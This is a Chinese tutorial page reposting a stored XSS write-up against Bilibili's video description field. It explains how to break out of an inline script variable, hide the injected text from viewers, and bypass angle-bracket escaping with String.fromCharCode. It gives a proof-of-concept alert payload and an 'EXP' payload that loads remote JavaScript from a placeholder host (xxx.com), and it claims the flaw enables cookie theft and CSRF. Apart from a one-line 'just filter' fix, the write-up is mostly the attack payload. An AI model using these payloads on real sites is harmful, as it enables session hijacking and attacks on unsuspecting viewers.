网站地图    收藏   

主页 > 后端 > 网站安全 >

哔哩哔哩弹幕网xss一枚(XSS分析与利用技巧) - 网

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] 可劫持cookie 可csrf在视频播放页面 查看源码 往下翻 有这么一段用户输入的内容包含在了脚本里分别是标题简介之类的。。。由于简介内容允许输入的字符最多于是我们在发布视频的简介...

可劫持cookie 可csrf
 
在视频播放页面 查看源码 往下翻 有这么一段
 
 
用户输入的内容包含在了脚本里
 
分别是标题简介之类的。。。由于简介内容允许输入的字符最多
 
于是我们在发布视频的简介里面构造代码
 
'};
先闭合掉前面的var p
 
然后清除简介里面的内容 防止别人起疑心
(s=$('.intro')[0]).innerText=s.innerText.substr(0,s.innerText.indexOf('\''));
 
 
最后添加恶意的js并且闭合后面(简介中的尖括号会被转换 稍微绕过一下)
$('.intro').append((a=String.fromCharCode)(60)+'script src=\'这里插入js地址\''+a(62));var p={a:'
 
 
POC:
'};(s=$('.intro')[0]).innerText=s.innerText.substr(0,s.innerText.indexOf('\''));$('.intro').append((a=String.fromCharCode)(60)+'script'+a(62)+'alert(1)'+a(60)+'/script'+a(62));var p={a:'

 

 
 


EXP:
'};(s=$('.intro')[0]).innerText=s.innerText.substr(0,s.innerText.indexOf('\''));$('.intro').append((a=String.fromCharCode)(60)+'script src=\'http://xxx.com/1.js\''+a(62));var p={a:'

 

 
尽量用短链 因为简介有长度限制
修复方案:
过滤呗 :)
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论